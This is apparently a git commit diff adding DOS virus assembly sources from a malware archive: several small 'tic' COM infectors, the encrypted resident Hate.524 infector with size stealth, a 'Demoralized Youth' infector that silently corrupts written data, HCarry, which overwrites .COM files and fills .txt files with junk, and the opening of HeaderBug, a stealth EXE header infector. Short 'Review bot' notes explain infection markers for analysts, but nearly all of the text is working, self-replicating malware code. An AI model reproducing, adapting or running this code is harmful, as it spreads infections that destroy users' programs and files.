re-organize

push
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,92 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
;THE FOLLOWING CODE MAKES THE VIRUS GO RESIDENT. TO KEEP THE INFECTION
;CODE AS SHORT AS POSSIBLE, THE INT 21 VECTOR (4 BYTES) IS SAVED OUTSIDE
;THE VIRUS BODY. THIS MAY OCCASIONALLY CAUSE THE VECTOR TO BE OVERWRITTEN
;BY THE ENVIRONMENT, WHICH WILL CRASH THE SYSTEM. TO PREVENT THIS, DEFINE
;TWO WORDS FOR THE LABEL INT21 AND ADD FOUR BYTES TO THE RESIDENT CODE.
;THE FIRST TIME THAT AN "INFECTED" FILE IS RUN, IT WILL SIMPLY RETURN TO
;DOS. THIS IS BECAUSE THE RESIDENT CODE MUST FIRST BE LOADED. AFTER THAT
;EVERYTHING WILL APPEAR TO WORK NORMALLY. TO REMEDY THIS PROBLEM, ALTER
;THE MEMORY CONTROL BLOCK TO TRAP THE RESIDENT CODE, THEN JUMP TO IT. A
;STILL BETTER SOLUTION IS TO COPY THE VIRUS TO THE TOP OF MEMORY AND
;TRAP IT THERE. ALSO, DO NOT REVECTOR INTERRUPT BUT OVERWRITE THE
;ENTRY POINT WITH A FAR JUMP TO THE VIRUS AND THEN RESTORE IT. THESE
;TECHNIQUES WILL MAKE A BETTER, THOUGH LONGER VIRUS.
;
start: mov ax,3521h ;GET INT 21 VECTOR
int 21h
mov di,offset int21
mov [di],bx ;SAVE IT
mov [di+2],es
mov dx,offset infect
mov ah,25h
int 21h ;REVECTOR TO VIRUS
mov dx,di
int 27h ;GO RESIDENT
;
;THIS IS THE ACTUAL INFECTION CODE. IT CHECKS FOR THE EXEC FUNCTION THEN
;TRIES TO RUN THE PROCESS AS AN EXE. IF THIS FAILS, THE VIRUS KNOWS THAT
;IT REALLY WAS A COM PROGRAM, IN WHICH CASE IT SIMPLY LETS THE CALL GO
;THROUGH. OTHERWISE A SHADOW COM FILE IS (RE)CREATED, "INFECTING" THE
;EXE. THE HIDDEN ATTRIBUTE IS SET ON THE SHADOW FILE. TO KEEP THESE FILES
;VISIBLE, SET CX TO 0 INSTEAD OF 2.
;NOTE: UNDER DOS 5.0, REGISTERS ES AND DS ARE SAME WHEN THE EXEC CALL
;IS ISSUED. SETTING ES TO DS IS ONLY NECESSARY TO MAKE THE VIRUS RUN UNDER
;DOS 3.X. OTHERWISE YOU CAN ELIMINATE THESE INSTRUCTIOS, BRINGING THE VIRUS
;BACK TO JUST 79 BYTES.
;
infect: cmp ax,4b00h ;EXEC?
jne interrupt ;IF NOT, CONTINUE INTERRUPT
push ax ;KEEP FUNCTION CALL
push es ;KEEP ES
push ds ;SET ES TO DS
pop es
mov di,dx ;SCAN TO EXT
mov al,'.'
repne scasb
push di ;POINTER TO EXT
mov ax,'XE' ;TRY TO RUN AS .EXE
stosw
stosb
pop di ;RETREIVE POINTER TO EXT
pop es ;RESTORE ES FOR EXEC
pop ax ;GET FUNCTION
push ax ;KEEP IT
push dx ;KEEP POINTER TO PROCESS NAME
pushf ;DO INTERRUPT
push cs
call interrupt
mov ax,'OC' ;CHANGE EXT TO COM
stosw
mov al,'M'
stosb
pop dx ;CLEAR STACK
pop ax
jc interrupt ;WASN'T .EXE SO JUST CONTINUE
mov cx,2
mov ah,3ch ;CREATE SHADOW .COM FILE
int 21h
xchg bx,ax ;GET HANDLE
push cs ;WRITE VIRUS TO .COM FILE
pop ds ;SEGMENT OF VIRUS CODE
mov cl,len
mov dx,si ;=0100 HEX
mov ah,40h ;WRITE VIRUS AND EXIT
;
interrupt:
db 0eah ;FAR JUMP
int21: ;VECTOR GOES HERE
;
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@@ -0,0 +1,83 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
start: mov ax,9000h ;MOVE VIRUS CODE UP
mov es,ax
mov di,si
mov cx,len
rep movsb
mov ds,cx ;DS = 0
mov si,84h ;INT 21 VECTOR
mov di,offset int21
push di
mov dx,offset infect
lodsw ;SAVE ORIGINAL VECTOR
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
je exit
stosw
lodsw
stosw
push es
pop ds
mov ax,2521h ;REVECTOR TO VIRUS
int 21h
exit: push cs ;RESTORE SEGMENT REGISTERS
pop ds
push cs
pop es
pop si ;SI = END OF VIRUS CODE
mov di,0fch
push di ;RETURN HERE
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
stosw
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
stosw
mov ch,0feh
ret ;MOVE CODE AND RUN PROGRAM
;
infect: pushf
push ax
push cx
push dx
push si
push ds
cmp ah,40h ;WRITE FUNC?
jne done
cmp bx,1
je mes
mov si,dx ;DS:DX = WRITE BUFFER
lodsb
cmp al,0b8h ;ALREADY INFECTED?
je done
cmp al,0ebh ;PROBABLY .COM
jne done
mov cx,len ;LENGTH OF VIRUS
mov dh,1 ;DX ASSUMED TO BE 0
hack: push cs
pop ds
pushf
call cs:[int21] ;WRITE VIRUS
done: pop ds
pop si
pop dx
pop cx
pop ax
popf ;CONTINUE INTERRUPT
jmp cs:[int21]
mes: mov cx,12
mov dx,offset string
jmp short hack
string db ' (H*ck-tic) '
;
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
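Review bot: The self-recognition test `cmp al,0b8h ;ALREADY INFECTED?` in `infect` does not say where the constant comes from: 0B8h is simply the opcode of this file's own first instruction (`mov ax,9000h`), so it is not a unique signature and clean programs that begin with `mov ax,imm16` carry the same byte. I would extend the comment to `;0B8h = OPCODE OF THE FIRST INSTRUCTION AT START, NOT A UNIQUE MARKER`. The same undocumented one-byte check recurs in the next two files as `cmp byte ptr [di], 0BEh` and `cmp byte ptr [di],0bbh`, matching their first instructions `mov si,0100h` and `mov bx,0fh`. The residency code also deserves a line: it copies itself to the fixed segment 9000h and replaces the INT 21h vector read from 0:84h, which is what memory triage would look for.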
@@ -0,0 +1,70 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
len equ offset last-100h
start: mov si,0100h
push si
mov ax,cs
add ah,10h
mov es,ax
xor di,di
mov cx,len
rep movsb
mov dx,0FE00h
mov ah,1Ah
int 21h
mov dx,offset file
mov ah,4Eh
jmp short find
retry: mov ah,3Eh
int 21h
mov ah,4Fh
find: push cs
pop ds
int 21h
mov cx,0FE1Eh
jc nofile
mov dx,cx
mov ax,3D02h
int 21h
xchg ax,bx
push es
pop ds
mov dx,di
mov ah,3Fh
int 21h
add ax,len
cmp byte ptr [di], 0BEh
je retry
push ax
xor cx,cx
mov ax,4200h
cwd
int 21h
pop cx
mov ah,40h
int 21h
jmp short retry
nofile: push cs
pop es
mov bl,0FCh
mov [bx],0AAACh
mov [bx+2],0FCE2h
pop di
push bx
ret
file db '*.COM',0
last db 0C3h
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
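Review bot: This file carries no comments at all, unlike the files around it, so the reader has to decode the DOS calls to learn what it does. A short header would cover it, for example `; non-resident: searches '*.COM' in the current directory (AH=4Eh/4Fh)` and `; rewrites each unmarked match from offset 0 with its own code followed by the original contents`. The constants `0FE00h` (DTA set with AH=1Ah), `0FE1Eh` (file name inside that DTA) and `0FCh` (where `nofile` builds its four-byte stub) also deserve a line each, since they are the fixed addresses an analyst would check in a memory image.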
@@ -0,0 +1,63 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset last-100h ;LENGTH OF VIRUS CODE
;
start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR
mov ah,4ah
int 21h
mov dx,es
add dh,10h
mov es,dx ;PROGRAM CODE WILL RUN HERE
push dx ;SET UP FOR FAR RETURN
push si
mov ah,26h ;CREATE NEW PSP
int 21h
mov di,si
mov si,offset last
push si
mov ch,0feh
rep movsb ;MOVE PROGRAM CODE UP
dec cx ;=FFFF
pop di
mov dx,offset file
mov ah,4eh ;FIND FIRST .COM FILE
jmp short find
retry: mov ah,4fh ;FIND NEXT
find: int 21h
jc nofile ;NO (MORE) FILES
mov dx,9eh ;FILE NAME IN DTA
mov ax,3d02h ;OPEN FILE
int 21h
xchg ax,bx ;1-BYTE MOVE OF AXBX
mov dx,di ;END OF VIRUS CODE
mov ah,3fh ;READ FILE DATA (CX=FFFF)
int 21h ;READ FILE AFTER VIRUS CODE
add ax,len ;LENGTH OF VIRUS+FILE
cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED
je retry ;TRY AGAIN
push ax
xor cx,cx
mov ax,4200h ;RESET FILE POINTER
cwd ;DX=0
int 21h
pop cx
mov dh,1
mov ah,40h ;WRITE INFECTED CODE BACK
int 21h
;
nofile: push es ;GO RUN PROGRAM
pop ds
retf
;
file db '*.COM',0 ;SEARCH FOR .COM FILES
last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS
tic ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+299
@@ -0,0 +1,299 @@
; Hate.524 (named by Moi because of Internal Text and Size)
; Uninteresting Encrypted COM Infector
; Source code compliments of PakiLad
p386n
seg000 segment byte public 'CODE' use16
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
start proc near
and al, 21h
mov ax, 5800h
int 21h ; Virus Installation Check
cmp ah, 58h ; Installed Already?
jnz InstallVirus ; No? Then JMP.
mov ah, 4Ch
int 21h ; Exit To DOS
InstallVirus:
call $+3
start endp
Next proc near
pop si
sub si, offset Next
mov dl, Cryptor[si]
cmp dl, 0
jz Crypted
mov cx, VirusSize
lea di, Crypted[si]
DecryptLoop:
mov al, [di]
xor al, dl
mov [di], al
inc di
loop DecryptLoop
Crypted:
mov ah, 14h
int 21h ; Install Check
cmp ah, 6 ; Installed?
jz RestoreCOM ; Yes? Then JMP.
jmp short DoInstall
RestoreCOM:
push cs
pop ds
mov ax, OrgByte1[si]
mov word ptr start, ax
mov ax, OrgByte2[si]
mov word ptr ds:102h, ax
mov al, OrgByte3[si]
mov byte ptr ds:104h, al
mov ax, offset start
push ax
retn ; Return to Original Program
DoInstall:
mov ah, 52h
int 21h ; Get List Of Lists
mov bx, es:[bx-2]
FindLastMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'Z' ; Last MCB?
jnz FindLastMCB ; No? Then JMP.
mov ax, es
mov es, bx
cmp byte ptr es:0, 'M' ; More MCB To Follow?
jz GotMoreMCB ; Yes? Then JMP.
mov es, ax ; ES points to MCB
jmp short GotMemory
GotMoreMCB:
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'M'
jz GotMoreMCB
GotMemory:
mov bx, es:3
mov ax, 795
mov cl, 4
shr ax, cl
sub bx, ax
mov es:3, bx
mov ax, es
add bx, ax
xor di, di
mov es, bx
mov cx, TotalSize+100h
push si
rep movsb ; Copy Virus Into Memory
pop si
push es
pop ds
mov ax, 3521h
int 21h ; Get Int 21h Vectors
mov Int21Ofs, bx
mov Int21Seg, es
mov ah, 25h
mov dx, offset NewInt21
int 21h ; Set New Int 21h Vectors
jmp RestoreCOM
Next endp
NewInt21: ; Install Check?
cmp ah, 14h
jnz CheckExecute ; No? Then JMP.
mov ah, 6 ; I'm Here!
iret
CheckExecute: ; Set Execution State?
cmp ah, 4Bh
jnz CheckFCBFind ; No? Then JMP.
jmp short InfectFile
CheckFCBFind: ; Find First File (FCB)?
cmp ah, 11h
jz FindFileFCB ; Yes? Then JMP.
cmp ah, 12h ; Find Next File (FCB)?
jnz DoOriginalFunc ; No? Then JMP.
FindFileFCB:
call CallInt21
pushf
pusha
push es
cmp al, 0 ; None found?
jnz NoFilesFound ; No? Then JMP.
mov ah, 2Fh
call CallInt21 ; Get DTA Segment/Offset
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
jnz NotExtFCB ; No? Then JMP.
add bx, 7
NotExtFCB:
mov al, es:[bx+17h]
and al, 1Fh
cmp al, 1Fh ; Infected Already?
jnz NoFilesFound ; No? Then JMP.
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
NoFilesFound:
pop es
popa
popf
iret
DoOriginalFunc:
jmp short $+2
JMPFar21 db 0EAh
Int21Ofs dw 0
Int21Seg dw 0
InfectFile:
pusha
push es
push ds
mov ax, 3D02h
call CallInt21 ; Open File
jnb FileOpened ; No problems? Then JMP.
jmp CloseFile
FileOpened:
xchg ax, bx
push cs
pop ds ; DS = CS
mov ah, 3Fh
mov cx, 5
mov dx, offset OrgByte1
call CallInt21 ; Read In 5 Bytes
mov ax, OrgByte1
add ah, al
cmp ah, 0A7h ; Infected Already?
jnz NotBad1 ; No? Then JMP.
jmp CloseFile
NotBad1: ; Infected Already?
cmp ah, 45h
jnz NoSigFound ; No? Then JMP.
jmp CloseFile
NoSigFound:
mov ax, 5700h
call CallInt21 ; Get File Date/Time
push cx
push dx
and cx, 1Fh
cmp cx, 1Fh ; Infected Already?
jnz MovePtrEnd ; No? Then JMP.
pop dx
pop cx
jmp short CloseFile
MovePtrEnd:
mov ax, 4202h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to End of File
sub ax, 3 ; Calculate JMP Offset
mov JMPOffset, ax
mov ah, 40h
mov cx, CryptSize
mov dx, offset start
call CallInt21 ; Write Crypt Routine to File
mov cx, VirusSize
mov si, offset Crypted
mov di, offset EndOfVirus
mov ax, 8F20h
push es
push ax
pop es
assume es:nothing
in al, 40h ; Get Random Number
xchg al, dl
mov Cryptor, dl
EncryptVirus:
mov al, [si]
xor al, dl
mov es:[di], al
inc si
inc di
loop EncryptVirus
mov cx, 1
EncryptSecond:
mov al, [si]
mov es:[di], al
inc si
inc di
loop EncryptSecond
pop es
assume es:nothing
push ds
mov ax, 8F20h
push ax
pop ds
assume ds:nothing
mov ah, 40h
mov cx, VirusSize2
mov dx, offset EndOfVirus
call CallInt21 ; Write Encrypted Virus To File
pop ds
assume ds:seg000
mov ax, 4200h
xor cx, cx
cwd
call CallInt21 ; Move Pointer to Beginning
mov ah, 40h
mov cl, 5
mov dx, offset InfMarker
call CallInt21 ; Write JMP And Infection Marker
pop dx
pop cx
or cx, 1Fh
mov ax, 5701h
call CallInt21 ; Fix File Date/Time
CloseFile:
mov ah, 3Eh
call CallInt21 ; Close File
pop ds
pop es
popa
jmp near ptr JMPFar21
CallInt21 proc near
pushf
call dword ptr cs:Int21Ofs
retn
CallInt21 endp
OrgByte1 dw 2124h
OrgByte2 dw 20CDh
OrgByte3 db 0
InfMarker dw 2124h
JMPInstruction db 0E9h
JMPOffset dw 0
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
Cryptor db 0
EndOfVirus:
CryptSize equ Crypted - start
VirusSize equ Cryptor - Crypted
VirusSize2 equ $ - Crypted
TotalSize equ $ - start
seg000 ends
end start
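Review bot: The infection marker is never explained in the header: `or cx, 1Fh` before the AX=5701h call sets the seconds field of the file time to 1Fh, which decodes to an impossible 62 seconds, and both `NoSigFound` and the FCB find handler test for that value. A header line such as `; marker: file time seconds field = 1Fh (62 s); FCB find-first/next subtract TotalSize from the reported size of such files` would give analysts the indicator and the size-hiding behaviour in one place. The literal `795` in `GotMemory` and the fixed scratch segment `8F20h` used in the encryption path are bare magic numbers and should be named with `equ` or commented.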
+325
@@ -0,0 +1,325 @@
_attr_ equ 0
_date_ equ 2
_time_ equ 4
fil equ 6
mov ax,4245h ;sepuku!
int 21h
jmp short jump1
db 'DY'
dy equ $-2-100h
_size dw offset total-100h
_ofs dw offset total
db 'McAfee, geht nach Hause! Wir sind unberwindlich!'
jump1:
mov ax,3521h
int 21h
mov old21[0],bx
mov old21[2],es
mov ax,cs
dec ax
mov ds,ax
lodsb
cmp byte [0],'Z'
jne bee_bloop_blap
cmp word ptr [0003h],pgf
jc bee_bloop_blap
sub word ptr [0003h],pgf
sub word ptr [0012h],pgf
mov es,[0012h]
mov si,110h
mov di,si
sub di,10h
mov cx,total-100h
rep movsb
push es
pop ds
cli
mov ax,2521h
mov dx,offset swansich
int 21h
sti
jmp 100h
bee_bloop_blap:
int 24h
int 20h
st21 db 0
vier:
mov al,0
iret
swansich:
pushf
cmp ax,4245h
jne not_sepuku
cmp word [dy+100h],'YD'
jne not_sepuku
popf
push bp
mov bp,sp
mov ds,[bp+4]
pop bp
mov si,word _ofs
mov cx,word _size
mov di,100h
push ds
pop es
cld
bam: rep movsb
pop ax
mov ax,100h
push ax
call zero_regs
iret
olr dw 0,0
not_sepuku:
cmp ah,40h
jne exec
cmp bx,5
jb exec
cmp cx,16
jl exec
call push_all
mov di,dx
add di,cx
dec di
mov al,[di]
mov bl,[di-1]
mov [di-1],al
mov [di],bl
call pop_all
exec:
cmp ax,4B00h ;exec
jne back
cmp cs:st21,0
jne back
mov cs:st21,1
call push_all
xchg si,dx
mov di,fil
push cs
pop es
mov cx,128
cld
rep movsb
call pop_all
popf
call o21
pushf
call push_all
mov ax,3524h
call o21
push bx
push es
mov ah,25h
push ds
push cs
pop ds
push dx
mov dx,offset vier
call o21
pop dx
pop ds
push cs
pop ds
mov dx,fil
mov ax,4300h
call o21
mov cs:[_attr_],cx
mov ax,4301h
xor cx,cx
call o21
jc err1
call infect
mov ax,4301h
mov cx,cs:[_attr_]
call o21
err1: pop ds
pop dx
mov ax,2524h
call o21
mov cs:st21,0
call pop_all
popf
retf 2
back: mov cs:st21,0
popf
jfa: db 0EAh
old21 dw 0,0
o21: pushf
call dword ptr cs:[old21]
ret
zero_regs:
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
ret
jmp_to dw 0
push_all:
pop cs:[jmp_to]
push bp
push ds
push es
push di
push si
push dx
push cx
push bx
push ax
jmp cs:[jmp_to]
pop_all:
pop cs:[jmp_to]
pop ax
pop bx
pop cx
pop dx
pop si
pop di
pop es
pop ds
pop bp
jmp cs:[jmp_to]
;|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
; infection routine
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
infect:
pushf
call push_all
mov ax,3D02h
call o21
jnc open
i_back:
call pop_all
popf
ret
open:
xchg bx,ax
push cs
pop ds
push cs
pop es
mov ax,5700h
call o21
mov [_date_],dx
mov [_time_],cx
mov ah,3Fh
mov cx,offset total-100h
mov dx,offset total
call o21
jnc read1
jcls1: jmp close
read1: cmp ax,cx
jne jcls1
cmp word ptr [offset total],'ZM'
je jcls1
cmp byte ptr [offset total],'Z'
je jcls1
cmp word ptr [offset total+dy],'YD'
je jcls1
mov ax,4202h
xor cx,cx
xor dx,dx
call o21
jc jcls1
cmp dx,0
jne jcls1
cmp ah,0F1h
ja jcls1
add ax,100h
mov _ofs,ax
mov ah,40h
mov dx,offset total
mov cx,offset total-100h
call o21
jc jcls1
cmp ax,cx
jne jcls1
mov ax,4200h
xor cx,cx
xor dx,dx
call o21
mov ah,40h
mov cx,offset total-100h
mov dx,100h
call o21
and byte [_time_],255-31
or byte [_time_],29
close:
mov ax,5701h
mov cx,[_time_]
mov dx,[_date_]
call o21
mov ah,3Eh
call o21
jcls2: jmp i_back
db 'Demoralized Youth vous a eu'
total:
pgf equ $/16*2
db 'Í '
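Review bot: The handler at `not_sepuku` has a data-corrupting side effect that nothing in the file documents: for AH=40h writes with handle 5 or above and at least 16 bytes, it swaps the last two bytes of the caller's buffer (`mov [di-1],al` / `mov [di],bl`) before passing the call on. That belongs in a header comment together with the other markers visible here: the `AX=4245h` call answered by `swansich`, the `'DY'` tag checked in `read1`, and the low five bits of the stored file time forced to 29 by `or byte [_time_],29`. Most of the file is uncommented, so a block comment per routine (`swansich`, `exec`, `infect`) would make the sample much easier to triage.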

@@ -0,0 +1,137 @@
;This is the HCarry Virus
;dedicated to the late Harry Carry
;The only AV scanner that I know of that detects this virus is TBAV Scanner
start: ;start of virus!
lea si, crypt_start
mov di,si
mov cx,end - crypt_start
call crypt
jmp crypt_start
xor_value db 0
crypt:
lodsb
xor al,byte ptr [xor_value]
stosb
loop crypt
ret
crypt_start:
mov ah,9 ;print string to screen
lea dx,textmask
int 21h ;go do it dos!
mov ax,0fa02
push ax
mov bl,0
mov dx,05945
push dx
int 016
push cx
mov ah,4eh ;find first file
lea dx,filemask ;put the kind of file we want to find first in dx
xor cx,cx ;clears the cx register to 0
find_next: ;label for the find next rountine
int 21h ; go do it!
jnc infect ;jump if a file is found, if not continue jnc=jump
jmp text ;if carry flag isn't set
infect: ;here is our infect rountine, where we go when we find a file to kill
mov ax,3d02h ; open file for read/write access (00=read
;01=write 02=read/write)
mov dx, 9eh ;get file info
int 21h ;now!~
mov bx,ax ;move info form bx register in ax
in al,40h
mov byte ptr [xor_value],al
mov ah,40h
lea dx,start
mov cx,crypt_start - start
int 21h
lea si,crypt_start
lea di,end
mov cx,end - crypt_start
call crypt
mov ah,40h ;40hex write to file
mov cx,end - crypt_start ; heres the length of what we want to write
lea dx,end ;and heres where to start
int 21h ; go!
mov ah,3eh ;close the file up
int 21h ;now!
mov ah,4fh ;find next file!
jmp find_next ;continue!
text:
mov ah,4eh
lea dx,textfile
int 21h
jnc text_pload
jmp close
text_pload:
mov ax,3d02h
mov dx,9eh
int 21h
mov ah,40h
mov cx,pload_end - pload_start
lea dx,pload_start
int 21h
jmp text_findnext
text_findnext:
mov ah,4fh
int 21h
jnc text_pload
jmp close
pload_start:
db 'HOLY COW!',10,13,
db '---',10,13,
db 'Whats your favorite planet?...Mines the SUN!',10,13,
db 'One time i studied it for a whole hour i almost went BLIND!',10,13,
db '---',10,13,
db 'Hey!....Whats goin.....Hey!',10,13,
db '---',10,13,
db 'Now just for some silly crap!',10,13,
db 'FLOCK!',10,13,
db 'Hehehehe Look At YOU!',10,13,
db 'Back to the Computer Store for you!',10,13,
db 'This is HORRRIBLE!'
db 'Who would do something like this?',10,13,
db 'MY LEG DOESNT BEND THAT WAY!',10,13,
db 'MOCB',10,13,
db 'This Virus has infected this file if you havnt found that out yet!',10,13,
db 'Please insert 25 cents!',10,13,
db 'DO DO DO Were Sorry your call did not go threw please hang up and try again',10,13,
db 'JERRY JERRY JERRY JERRY JERRY JERRY',10,13,
db 'Jerry Springer to HOT for Television',10,13,
db 'DOH!',10,13,
pload_end:
close:
int 20h ;exit program
;this next portion is the datasegment which the virus refers to for
;the variable we give it
;Thank you to Spo0ky,<-OPIC->,and Arsonic for helping me!
textfile db '*.txt',0 ;find .txt files
filemask db '*.com',0 ;the kinds of files we want
textmask db 'This file is now infected!',10,13,
db 'By The HCarry virus!',10,13,
db 'MoCBDUKE[Codebreaker, 1998]',10,13,'$'
end:
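Review bot: The sequence `mov ax,0fa02` / `mov bl,0` / `mov dx,05945` / `int 016` at the top of `crypt_start` has no comment, and it is the one part of the file whose purpose is not obvious from the code. These register values look like the VSAFE/VWATCH resident-monitor options call with every option flag cleared, which would be worth stating as `;INT 16h AX=FA02h DX=5945h: VSAFE/VWATCH set options, BL=0 (confirm)`. The comments also do not say that matching `*.com` files are written from offset 0 rather than extended, so the original program is not preserved, or that the `text` routine targets `*.txt` files with the `pload_start` block; both matter for recovery.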
@@ -0,0 +1,288 @@
;=============================================================================
; Virus Name: HeaderBug
; Effective Length: 324 Bytes (no increase in file length)
;
; Notes:
; - resident, BIOS-level-stealth .EXE header infector
; - undetectable by any current A-V scanner even w/o stealth
; - infects SMARTDRV.EXE to ensure residency at each boot
; - infects .EXE header sectors whenever accessed for write
; OR read (during reads only if A-V monitor is not
; resident)
; - As a result, will infect every target .EXE file during
; even such operations as a fixed disk DEFRAG
; - successfully infects Windows .EXE files without
; detection even when 32-bit file access is in use
; - does not decrease available memory
; - no harmful payload
;
; To Compile:
; - use shareware A86 assembler
; - type "a86 headbug.a86"
; - resulting headbug.com is actually an .exe file.
; It is a virus dropper which, if executed, will infect
; your system with HeaderBug
;=============================================================================
start_offset equ 07d*4-1
res_offset equ start_offset-01a0
com_offset equ 0100
header_offset equ 01a0
infect_tag equ 0c033
setver_tag equ 0d4a
viruslength equ 0144
old_code_length equ 012
EH_Signature dw 'ZM' ;set to 'MZ' or 'ZM' for .exe files
EH_Modulo dw 0000 ;remainder of file size/512
EH_Size dw 0012 ;file size/512
EH_Reloc dw 0000 ;6 ;number of relocation items
EH_Size_Header dw 000a ;8 ;size of header in paragraphs
EH_Min_Mem dw 0240 ;minimum paragraphs needed by file
EH_Max_Mem dw 0240 ;maximum paragraphs needed by file
EH_SS dw 0240 ;stack segment displacement
EH_SP dw ? ;stack pointer
EH_Checksum dw ? ;checksum, not used
EH_IP dw 0000 ;14 ;instruction Pointer of Exe file
EH_CS dw 0000 ;16 ;code segment displacement of .exe
EH_1st_reloc dw ? ;first relocation item
EH_ovl dw ? ;overlay number
db 084 dup ? ;pad rest of header w/dummy bytes
;-----------------------------------------------------------------------------
; Header_entry - Tests interrupt vector table for room and if there is room,
; installs virus in unused area of interrupt table. Read and write disk
; cache on all drives are disabled (prevents infection problems), SMARTDRV
; infected in default directory to ensure that virus becomes resident on each
; boot and that SMARTDRV's disk cache is never installed. SMARTDRV is
; infected through read-file action (not write) by installed int13 routine.
;-----------------------------------------------------------------------------
header_entry:
xor ax,ax ;set ax=0
mov ds,ax ;set ds=ax
mov es,ax ;set es=ax
dec ax ;set ax=ffffh as flag for zero_test
mov si,start_offset ;set si to start address in INT table
push si ;save value for later use
call zero_test ;check for clear area in INT table
pop di ;set destination offset to INT table
jc exit_header ;if area not clear, exit, don't install
xor si,si ;set source offset to virus start
call move_it ;move virus to empty space in INT table
mov di,offset old13+res_offset ;set destination for int13
mov si,013*04 ;set source for int13 vector
push si ;save value for later use
movsw ;copy int13 vector
movsw
pop di ;set destination for new value
mov ax,offset int13+res_offset ;virus int13 routine offset
stosw ;store new offset in int13
xor ax,ax ;virus int13 routine segment
stosw ;steal int13
mov bx,03 ;value required for STATUS call
mov bp,05 ;set max. number of drives
kill_cache:
